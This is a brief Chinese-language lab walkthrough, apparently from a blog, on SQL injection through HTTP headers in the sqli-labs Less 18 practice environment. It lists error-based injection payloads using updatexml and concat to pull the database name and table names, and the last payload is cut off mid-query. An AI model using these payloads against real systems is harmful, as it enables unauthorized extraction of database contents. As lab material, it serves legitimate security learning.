16、HTTP头注入(User-Agent、Referer)

环境sqli-labs less 18 1、在UA处输入特殊字符,报错 ​ 2、构造输入语句,获取数据库名称 or updatexml(1,concat(’##’,(database())),0))# 3、获取表名 or updatexml(1,concat(’##’,(select group_concat(table_name) from information_schema.tables w
相关文章
相关标签/搜索